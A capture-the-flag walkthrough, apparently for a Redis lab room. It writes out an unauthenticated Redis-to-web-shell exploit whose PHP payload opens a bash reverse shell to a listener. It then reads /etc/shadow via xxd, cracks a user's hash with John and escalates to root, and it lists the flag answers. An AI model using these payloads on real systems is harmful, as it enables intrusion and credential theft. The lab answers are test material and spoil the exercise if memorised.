Ans: 2
Ans: redis
Ans: 6379
Ans: 6.0.7
Let’s Connect with redis-cli
using the below syntax
redis-cli -h <Machine-IP>
We found a Username — vianka,
so let’s Enumerate Further
redis-cli
config set dir /var/www/html
config set dbfilename shell.php
set test "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/10.11.36.171/4444 0>&1'\"); ?>"
save
2. Now, let’s start a netcat listener using the Following Command
nc -lvp 4444
3. Then Navigate to http://<Machine-IP>/shell.php
Ans: thm{red1s_rce_w1thout_credent1als}
On Analysing GTFObins we found a binary to read files with sudo permissions,
$ python3 -c "import pty; pty.spawn('/bin/bash')"$ LFILE=/etc/shadow
$ /usr/bin/xxd "$LFILE" | /usr/bin/xxd -r
root:!:18507:0:99999:7:::
daemon:*:17953:0:99999:7:::
bin:*:17953:0:99999:7:::
sys:*:17953:0:99999:7:::
sync:*:17953:0:99999:7:::
games:*:17953:0:99999:7:::
man:*:17953:0:99999:7:::
lp:*:17953:0:99999:7:::
mail:*:17953:0:99999:7:::
news:*:17953:0:99999:7:::
uucp:*:17953:0:99999:7:::
proxy:*:17953:0:99999:7:::
www-data:*:17953:0:99999:7:::
backup:*:17953:0:99999:7:::
list:*:17953:0:99999:7:::
irc:*:17953:0:99999:7:::
gnats:*:17953:0:99999:7:::
nobody:*:17953:0:99999:7:::
systemd-timesync:*:17953:0:99999:7:::
systemd-network:*:17953:0:99999:7:::
systemd-resolve:*:17953:0:99999:7:::
systemd-bus-proxy:*:17953:0:99999:7:::
syslog:*:17953:0:99999:7:::
_apt:*:17953:0:99999:7:::
messagebus:*:18506:0:99999:7:::
uuidd:*:18506:0:99999:7:::
vianka:$6$2p.tSTds$qWQfsXwXOAxGJUBuq2RFXqlKiql3jxlwEWZP6CWXm7kIbzR6WzlxHR.UHmi.hc1/TuUOUBo/jWQaQtGSXwvri0:18507:0:99999:7:::
3. Now copy and store the hash of vianka
into a file named hash.txt
in your system. (Make sure to check the hash if you paste the hash via the terminal)
4. Now Let’s use john to crack the password using the below command
$ john hash.txtUsing default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
beautiful1 (vianka)
Session completed.
Ans: beautiful1
vianka
with her password beautiful1
using the command su vianka
and let’s check what commands vianka can run2. She can run all commands so lets sudo it
sudo su
cat /root/root.txt
Ans: thm{xxd_pr1v_escalat1on}